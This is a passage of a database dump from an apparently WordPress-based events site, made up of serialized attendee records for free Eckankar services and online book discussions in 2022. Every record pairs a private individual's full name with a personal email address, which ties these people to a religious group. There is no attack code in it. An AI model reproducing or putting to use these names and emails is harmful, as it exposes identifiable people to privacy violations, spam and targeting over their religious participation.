Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1662892200:1662895800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1662892200;s:20:\"ticket_timestamp_end\";i:1662895800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438107,'BGC17641_cached','a:1:{i:0;a:24:{s:5:\"email\";s:18:\"zgraff@charter.net\";s:4:\"name\";s:13:\"Carolyn Graff\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:32:\"Experience HU, The Sound of Soul\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1662287400:1662291000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1662287400;s:20:\"ticket_timestamp_end\";i:1662291000;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438108,'DCT33560_cached','a:1:{i:0;a:24:{s:5:\"email\";s:21:\"huusinger@comcast.net\";s:4:\"name\";s:14:\"Gordon Garland\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:32:\"Experience HU, The Sound of Soul\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1662287400:1662291000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1662287400;s:20:\"ticket_timestamp_end\";i:1662291000;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438109,'TUN63374_cached','a:1:{i:0;a:24:{s:5:\"email\";s:13:\"kelik0@me.com\";s:4:\"name\";s:13:\"Keli Kinsella\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:32:\"Experience HU, The Sound of Soul\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1662287400:1662291000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1662287400;s:20:\"ticket_timestamp_end\";i:1662291000;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438110,'NAV22465_cached','a:1:{i:0;a:24:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Those Wonderful ECK Masters\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1661082300:1661086800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1661082300;s:20:\"ticket_timestamp_end\";i:1661086800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438111,'UPC13837_cached','a:1:{i:0;a:24:{s:5:\"email\";s:21:\"huusinger@comcast.net\";s:4:\"name\";s:14:\"Gordon garland\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Those Wonderful ECK Masters\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1661082300:1661086800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1661082300;s:20:\"ticket_timestamp_end\";i:1661086800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438112,'HKR22239_cached','a:1:{i:0;a:24:{s:5:\"email\";s:26:\"colleynadanler@hotmail.com\";s:4:\"name\";s:15:\"Colleyna Danler\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Those Wonderful ECK Masters\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1661082300:1661086800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1661082300;s:20:\"ticket_timestamp_end\";i:1661086800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438113,'HNP42868_cached','a:1:{i:0;a:24:{s:5:\"email\";s:18:\"zgraff@charter.net\";s:4:\"name\";s:13:\"Carolyn Graff\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Those Wonderful ECK Masters\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1661082300:1661086800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1661082300;s:20:\"ticket_timestamp_end\";i:1661086800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438114,'FGJ98579_cached','a:1:{i:0;a:24:{s:5:\"email\";s:18:\"zgraff@charter.net\";s:4:\"name\";s:13:\"Carolyn Graff\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Wisdom of the Heart, Book 4\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1660676400:1660680000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1660676400;s:20:\"ticket_timestamp_end\";i:1660681800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438115,'XRD92748_cached','a:1:{i:0;a:24:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Wisdom of the Heart, Book 4\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1660676400:1660680000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1660676400;s:20:\"ticket_timestamp_end\";i:1660681800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438116,'NPY55281_cached','a:1:{i:0;a:24:{s:5:\"email\";s:18:\"n.condon@yahoo.com\";s:4:\"name\";s:5:\"Nancy\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1660473000:1660476600\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1660473000;s:20:\"ticket_timestamp_end\";i:1660519800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438117,'ENQ21914_cached','a:1:{i:0;a:24:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:18:\"Bonnie Greenstreet\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1660473000:1660476600\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1660473000;s:20:\"ticket_timestamp_end\";i:1660519800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438118,'GNP97349_cached','a:1:{i:0;a:24:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"Jorge Santiago\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1660473000:1660476600\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1660473000;s:20:\"ticket_timestamp_end\";i:1660519800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438119,'NVD41326_cached','a:1:{i:0;a:24:{s:5:\"email\";s:24:\"darlenerreed@comcast.net\";s:4:\"name\";s:12:\"Darlene Reed\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1660473000:1660476600\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1660473000;s:20:\"ticket_timestamp_end\";i:1660519800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438120,'KHZ16572_cached','a:1:{i:0;a:24:{s:5:\"email\";s:20:\"rmorandi@comcast.net\";s:4:\"name\";s:13:\"Roger Morandi\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1660473000:1660476600\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1660473000;s:20:\"ticket_timestamp_end\";i:1660519800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438121,'DKQ16933_cached','a:1:{i:0;a:24:{s:5:\"email\";s:24:\"russellvreed@comcast.net\";s:4:\"name\";s:12:\"Russell Reed\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1660473000:1660476600\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1660473000;s:20:\"ticket_timestamp_end\";i:1660519800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438122,'FRH10759_cached','a:1:{i:0;a:24:{s:5:\"email\";s:20:\"lmrousseau@gmail.com\";s:4:\"name\";s:19:\"Lisa-Marie Rousseau\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1660473000:1660476600\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1660473000;s:20:\"ticket_timestamp_end\";i:1660519800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438123,'ETD58832_cached','a:1:{i:0;a:24:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Wisdom of the Heart, Book 4\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1658257200:1658260800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1658257200;s:20:\"ticket_timestamp_end\";i:1658262600;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438124,'RPJ12773_cached','a:1:{i:0;a:24:{s:5:\"email\";s:18:\"zgraff@charter.net\";s:4:\"name\";s:13:\"Carolyn Graff\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Wisdom of the Heart, Book 4\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1658257200:1658260800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1658257200;s:20:\"ticket_timestamp_end\";i:1658262600;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438125,'GFQ26947_cached','a:1:{i:0;a:24:{s:5:\"email\";s:24:\"hospiceallembe@gmail.com\";s:4:\"name\";s:16:\"Rebazar allembe \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Those Wonderful ECK Masters\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1658058300:1658062800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1658058300;s:20:\"ticket_timestamp_end\";i:1658062800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438126,'HBU30082_cached','a:1:{i:0;a:24:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Those Wonderful ECK Masters\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1658058300:1658062800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1658058300;s:20:\"ticket_timestamp_end\";i:1658062800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438127,'MWK57524_cached','a:1:{i:0;a:24:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"jorge santiago\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1657449000:1657495800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1657449000;s:20:\"ticket_timestamp_end\";i:1657495800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438128,'QHT74612_cached','a:1:{i:0;a:24:{s:5:\"email\";s:21:\"renee4eck@hotmail.com\";s:4:\"name\";s:12:\"Renee Wholey\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1657449000:1657495800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1657449000;s:20:\"ticket_timestamp_end\";i:1657495800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438129,'FGB37612_cached','a:1:{i:0;a:24:{s:5:\"email\";s:20:\"rmorandi@comcast.net\";s:4:\"name\";s:13:\"Roger Morandi\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1657449000:1657495800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1657449000;s:20:\"ticket_timestamp_end\";i:1657495800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438130,'KND86843_cached','a:1:{i:0;a:24:{s:5:\"email\";s:20:\"kellywinfo@gmail.com\";s:4:\"name\";s:13:\"Kelly Walker \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1657449000:1657495800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1657449000;s:20:\"ticket_timestamp_end\";i:1657495800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438131,'FGM19808_cached','a:1:{i:0;a:24:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:19:\"Bonnie Greenstreet \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1657449000:1657495800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1657449000;s:20:\"ticket_timestamp_end\";i:1657495800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438132,'YVR35929_cached','a:1:{i:0;a:24:{s:5:\"email\";s:15:\"harusan@aol.com\";s:4:\"name\";s:5:\"Hal H\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1657449000:1657495800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1657449000;s:20:\"ticket_timestamp_end\";i:1657495800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438133,'XDS71085_cached','a:1:{i:0;a:24:{s:5:\"email\";s:15:\"harusan@aol.com\";s:4:\"name\";s:11:\"Hal Garnett\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound 